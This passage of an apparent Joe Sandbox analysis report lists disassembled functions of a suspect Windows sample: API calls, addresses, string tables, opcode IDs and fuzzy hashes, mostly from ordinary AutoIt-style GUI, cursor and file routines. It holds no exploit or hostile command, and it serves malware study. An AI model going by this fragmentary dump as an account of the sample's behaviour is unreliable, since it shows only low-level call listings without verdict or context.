                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                    • API String ID: 3974292440-719923060
                    • Opcode ID: 90254a2d79c4fceb9fb0bb7f61d154d6b3b93b6c3b24ad4f003ac56be77266d9
                    • Instruction ID: 58e87bea7be3711170950dd493fb2e259e6f33d66fa0c9e6fdadce1d1b65488b
                    • Opcode Fuzzy Hash: 90254a2d79c4fceb9fb0bb7f61d154d6b3b93b6c3b24ad4f003ac56be77266d9
                    • Instruction Fuzzy Hash: CBA1B030214301DBCB14EF24C845A6AB3B5FF84314F148969B99AAB3D2DB79FC09CB51
                    Function 007C52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                    Download Yara Rule
                    APIs
                    • LoadCursorW.USER32(00000000,00007F89), ref: 007C5309
                    • LoadCursorW.USER32(00000000,00007F8A), ref: 007C5314
                    • LoadCursorW.USER32(00000000,00007F00), ref: 007C531F
                    • LoadCursorW.USER32(00000000,00007F03), ref: 007C532A
                    • LoadCursorW.USER32(00000000,00007F8B), ref: 007C5335
                    • LoadCursorW.USER32(00000000,00007F01), ref: 007C5340
                    • LoadCursorW.USER32(00000000,00007F81), ref: 007C534B
                    • LoadCursorW.USER32(00000000,00007F88), ref: 007C5356
                    • LoadCursorW.USER32(00000000,00007F80), ref: 007C5361
                    • LoadCursorW.USER32(00000000,00007F86), ref: 007C536C
                    • LoadCursorW.USER32(00000000,00007F83), ref: 007C5377
                    • LoadCursorW.USER32(00000000,00007F85), ref: 007C5382
                    • LoadCursorW.USER32(00000000,00007F82), ref: 007C538D
                    • LoadCursorW.USER32(00000000,00007F84), ref: 007C5398
                    • LoadCursorW.USER32(00000000,00007F04), ref: 007C53A3
                    • LoadCursorW.USER32(00000000,00007F02), ref: 007C53AE
                    • GetCursorInfo.USER32(?), ref: 007C53BE
                    • GetLastError.KERNEL32(00000001,00000000), ref: 007C53E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Cursor$Load$ErrorInfoLast
                    • String ID:
                    • API String ID: 3215588206-0
                    • Opcode ID: 485c12c016353df056736d3db255fc47cecfadfd20b266cb51e48a47ff8414d8
                    • Instruction ID: 9deaa2ff084abe0c47814e5335f8f0ad7ffd8fca40318487451f43eb41be6795
                    • Opcode Fuzzy Hash: 485c12c016353df056736d3db255fc47cecfadfd20b266cb51e48a47ff8414d8
                    • Instruction Fuzzy Hash: 43415170E04319AADB109FBA8C49D6FFFB8EF51B50B10452FE509E7290DAB8A541CE61
                    Function 007AAA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetClassNameW.USER32(?,?,00000100), ref: 007AAAA5
                    • __swprintf.LIBCMT ref: 007AAB46
                    • _wcscmp.LIBCMT ref: 007AAB59
                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007AABAE
                    • _wcscmp.LIBCMT ref: 007AABEA
                    • GetClassNameW.USER32(?,?,00000400), ref: 007AAC21
                    • GetDlgCtrlID.USER32(?), ref: 007AAC73
                    • GetWindowRect.USER32(?,?), ref: 007AACA9
                    • GetParent.USER32(?), ref: 007AACC7
                    • ScreenToClient.USER32(00000000), ref: 007AACCE
                    • GetClassNameW.USER32(?,?,00000100), ref: 007AAD48
                    • _wcscmp.LIBCMT ref: 007AAD5C
                    • GetWindowTextW.USER32(?,?,00000400), ref: 007AAD82
                    • _wcscmp.LIBCMT ref: 007AAD96
                      • Part of subcall function 0077386C: _iswctype.LIBCMT ref: 00773874
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                    • String ID: %s%u
                    • API String ID: 3744389584-679674701
                    • Opcode ID: 97ff642242b3e1b97310f6e6a9fd62a61926b8b63a3f5e37db90ce14424076f2
                    • Instruction ID: bbf00f554eb58eef581c465f48a335ed4c3e36ef6635566e12d724182ac4a7cf
                    • Opcode Fuzzy Hash: 97ff642242b3e1b97310f6e6a9fd62a61926b8b63a3f5e37db90ce14424076f2
                    • Instruction Fuzzy Hash: 78A1CE71205306FBDB18DF24C884BEAB7E8FF85355F008629F999D2590D738E945CBA2
                    Function 007AB397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                    Download Yara Rule
                    APIs
                    • GetClassNameW.USER32(00000008,?,00000400), ref: 007AB3DB
                    • _wcscmp.LIBCMT ref: 007AB3EC
                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 007AB414
                    • CharUpperBuffW.USER32(?,00000000), ref: 007AB431
                    • _wcscmp.LIBCMT ref: 007AB44F
                    • _wcsstr.LIBCMT ref: 007AB460
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 007AB498
                    • _wcscmp.LIBCMT ref: 007AB4A8
                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 007AB4CF
                    • GetClassNameW.USER32(00000018,?,00000400), ref: 007AB518
                    • _wcscmp.LIBCMT ref: 007AB528
                    • GetClassNameW.USER32(00000010,?,00000400), ref: 007AB550
                    • GetWindowRect.USER32(00000004,?), ref: 007AB5B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                    • String ID: @$ThumbnailClass
                    • API String ID: 1788623398-1539354611
                    • Opcode ID: ae8c8433e30a36d58070e30d409b537d656604f0a5d02214649693913b6b2350
                    • Instruction ID: 206420b42ffddcba62319ce58d1a498245173ef1189d2811283cde36adf1c820
                    • Opcode Fuzzy Hash: ae8c8433e30a36d58070e30d409b537d656604f0a5d02214649693913b6b2350
                    • Instruction Fuzzy Hash: B581A0710083459BDB04DF50C885FAA7BE8FF85714F04866AFD899A0A3DB38DD49CBA1
                    Function 007AB1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                    • API String ID: 1038674560-1810252412
                    • Opcode ID: 754a8317e6190280cd4a412bec9720c9c68e1d1053f064aaa79285eac319ba29
                    • Instruction ID: 6353035a3358a954f2a415de57fea5df77be3551265b02b1a4f0a832d718f060
                    • Opcode Fuzzy Hash: 754a8317e6190280cd4a412bec9720c9c68e1d1053f064aaa79285eac319ba29
                    • Instruction Fuzzy Hash: 8831AD32A04209E6DB14EA60DD47AEE77A8BF21751F604229F8A1B11D3EF9E6E08C551
                    Function 007AC4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • LoadIconW.USER32(00000063), ref: 007AC4D4
                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007AC4E6
                    • SetWindowTextW.USER32(?,?), ref: 007AC4FD
                    • GetDlgItem.USER32(?,000003EA), ref: 007AC512
                    • SetWindowTextW.USER32(00000000,?), ref: 007AC518
                    • GetDlgItem.USER32(?,000003E9), ref: 007AC528
                    • SetWindowTextW.USER32(00000000,?), ref: 007AC52E
                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007AC54F
                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007AC569
                    • GetWindowRect.USER32(?,?), ref: 007AC572
                    • SetWindowTextW.USER32(?,?), ref: 007AC5DD
                    • GetDesktopWindow.USER32 ref: 007AC5E3
                    • GetWindowRect.USER32(00000000), ref: 007AC5EA
                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 007AC636
                    • GetClientRect.USER32(?,?), ref: 007AC643
                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 007AC668
                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007AC693
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                    • String ID:
                    • API String ID: 3869813825-0
                    • Opcode ID: 08da9938697ee66f1357f9a3bb481b629981a1f062a080ee904d6f8fc5321e23
                    • Instruction ID: f1c26ca2a06b741d4f24205fd3c9ed8d5b4ed62bfdfb01bf916816f767346e52
                    • Opcode Fuzzy Hash: 08da9938697ee66f1357f9a3bb481b629981a1f062a080ee904d6f8fc5321e23
                    • Instruction Fuzzy Hash: 85516D70900709EFDB21DFA8DD89B6EBBF5FF44704F104A29E682A25A0D778E914CB54
                    Function 007DA428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 007DA4C8
                    • DestroyWindow.USER32(?,?), ref: 007DA542
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007DA5BC
                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007DA5DE
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007DA5F1
                    • DestroyWindow.USER32(00000000), ref: 007DA613
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00750000,00000000), ref: 007DA64A
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007DA663
                    • GetDesktopWindow.USER32 ref: 007DA67C
                    • GetWindowRect.USER32(00000000), ref: 007DA683
                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007DA69B
                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007DA6B3
                      • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                    • String ID: 0$tooltips_class32
                    • API String ID: 1297703922-3619404913
                    • Opcode ID: f8159524776ff27a36e6a7d3f40c6eb2c33a50c2ca987a85665803f3c0232ba7
                    • Instruction ID: 11b2714402fd253fbf0af62c8026dbc57a7f9271379879de12d24506ea59791b
                    • Opcode Fuzzy Hash: f8159524776ff27a36e6a7d3f40c6eb2c33a50c2ca987a85665803f3c0232ba7
                    • Instruction Fuzzy Hash: A7715A71140205EFD710CF28C849FA67BF9FB88304F08492EF995872A1D779E955CB16
                    Function 007DC8EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • DragQueryPoint.SHELL32(?,?), ref: 007DC917
                      • Part of subcall function 007DADF1: ClientToScreen.USER32(?,?), ref: 007DAE1A
                      • Part of subcall function 007DADF1: GetWindowRect.USER32(?,?), ref: 007DAE90
                      • Part of subcall function 007DADF1: PtInRect.USER32(?,?,007DC304), ref: 007DAEA0
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 007DC980
                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007DC98B
                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007DC9AE
                    • _wcscat.LIBCMT ref: 007DC9DE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 007DC9F5
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 007DCA0E
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 007DCA25
                    • SendMessageW.USER32(?,000000B1,?,?), ref: 007DCA47
                    • DragFinish.SHELL32(?), ref: 007DCA4E
                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007DCB41
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                    • API String ID: 169749273-3440237614
                    • Opcode ID: 81416c7a42706095794aeb01d2f84aaf579c65133aa08cd7725bf590ce9f1b56
                    • Instruction ID: f127aeeda094f59d1af222c14b7c115540e88c30b2047ac1f1b254d781001faa
                    • Opcode Fuzzy Hash: 81416c7a42706095794aeb01d2f84aaf579c65133aa08cd7725bf590ce9f1b56
                    • Instruction Fuzzy Hash: 30615A71508301AFC701DF64DC89D9BBBF9FF88710F004A2EF596962A1DB789A49CB52
                    Function 007D4619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 007D46AB
                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007D46F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BuffCharMessageSendUpper
                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                    • API String ID: 3974292440-4258414348
                    • Opcode ID: 59551273684a14693b7348e76b45a6f28b8e5736bbb560019c2cf8960b4bd74a
                    • Instruction ID: 388736a00d7e8ab7cd34d0d0895a6ecfd87f7b49d6c4cd969c18d10c44c917c8
                    • Opcode Fuzzy Hash: 59551273684a14693b7348e76b45a6f28b8e5736bbb560019c2cf8960b4bd74a
                    • Instruction Fuzzy Hash: C7918C34204701DFCB14EF20C855AAAB7A1AF95354F04886DF9965B3A2CB79FD0ACB91
                    Function 007DBAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007DBB6E
                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007D9431), ref: 007DBBCA
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DBC03
                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007DBC46
                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DBC7D
                    • FreeLibrary.KERNEL32(?), ref: 007DBC89
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007DBC99
                    • DestroyIcon.USER32(?,?,?,?,?,007D9431), ref: 007DBCA8
                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007DBCC5
                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007DBCD1
                      • Part of subcall function 0077313D: __wcsicmp_l.LIBCMT ref: 007731C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                    • String ID: .dll$.exe$.icl
                    • API String ID: 1212759294-1154884017
                    • Opcode ID: 295c840fa44145a0259b06dc7a0ab31cc94255351642237b76d9c3850f2eba20
                    • Instruction ID: dba31cae3a5e634bfa514fc1a9e4446207d4492149f31f4d54b8cbf6858185de
                    • Opcode Fuzzy Hash: 295c840fa44145a0259b06dc7a0ab31cc94255351642237b76d9c3850f2eba20
                    • Instruction Fuzzy Hash: 4161B171600619FAEB14DF64CC45FBE77B8FB08721F108116F919D62D1DBB8AA90DB60
                    Function 007BA0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON
                    Download Yara Rule
                    APIs
                    • LoadStringW.USER32(00000066,?,00000FFF,007DFB78), ref: 007BA0FC
                      • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 007BA11E
                    • __swprintf.LIBCMT ref: 007BA177
                    • __swprintf.LIBCMT ref: 007BA190
                    • _wprintf.LIBCMT ref: 007BA246
                    • _wprintf.LIBCMT ref: 007BA264
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: LoadString__swprintf_wprintf$_memmove
                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%~
                    • API String ID: 311963372-3531514502
                    • Opcode ID: 9fc1e7de646263b00eee6c025c5fe2d46df9b9a52af9109eb1b2cec47aa1a674
                    • Instruction ID: 54a5c8d3c9ad43912aa65394f23f2675a0629e137153cfa7e3b67b9779da7a04
                    • Opcode Fuzzy Hash: 9fc1e7de646263b00eee6c025c5fe2d46df9b9a52af9109eb1b2cec47aa1a674
                    • Instruction Fuzzy Hash: 75517C71900209FACF19EBE0DD8AEEEB779BF04301F104165F805A21A1EB796F59DB61
                    Function 007BA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                    • CharLowerBuffW.USER32(?,?), ref: 007BA636
                    • GetDriveTypeW.KERNEL32 ref: 007BA683
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA6CB
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA702
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA730
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                    • API String ID: 2698844021-4113822522
                    • Opcode ID: 3159521f21191b3344d95cdb7c035978af21bf9abb46c321b70c939b2991eb75
                    • Instruction ID: 8260efd39adad0c3bd6995d6d910d901cef0e2a96ff99080df74c46aaf77a255
                    • Opcode Fuzzy Hash: 3159521f21191b3344d95cdb7c035978af21bf9abb46c321b70c939b2991eb75
                    • Instruction Fuzzy Hash: 1E512871104304DFC704EF20D8859AAB7B4FF94719F04896DF89697291DB79EE0ACB52
                    Function 007BA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007BA47A
                    • __swprintf.LIBCMT ref: 007BA49C
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 007BA4D9
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007BA4FE
                    • _memset.LIBCMT ref: 007BA51D
                    • _wcsncpy.LIBCMT ref: 007BA559
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007BA58E
                    • CloseHandle.KERNEL32(00000000), ref: 007BA599
                    • RemoveDirectoryW.KERNEL32(?), ref: 007BA5A2
                    • CloseHandle.KERNEL32(00000000), ref: 007BA5AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                    • String ID: :$\$\??\%s
                    • API String ID: 2733774712-3457252023
                    • Opcode ID: 7312a74735550501d376482329739c6cf03ffc4e5285ab46824f19425fa62efc
                    • Instruction ID: eecf243ec47967a34e4a39fda1c5db1394a5ff7b633b3cd5dbfc0c2adf8a179f
                    • Opcode Fuzzy Hash: 7312a74735550501d376482329739c6cf03ffc4e5285ab46824f19425fa62efc
                    • Instruction Fuzzy Hash: 5631AEB1500219BBDB209FA0DC48FEB37BCEF88741F1080B6F909D2160E77897548B29
                    Function 007BDB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                    Download Yara Rule
                    APIs
                    • __wsplitpath.LIBCMT ref: 007BDC7B
                    • _wcscat.LIBCMT ref: 007BDC93
                    • _wcscat.LIBCMT ref: 007BDCA5
                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007BDCBA
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007BDCCE
                    • GetFileAttributesW.KERNEL32(?), ref: 007BDCE6
                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 007BDD00
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007BDD12
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
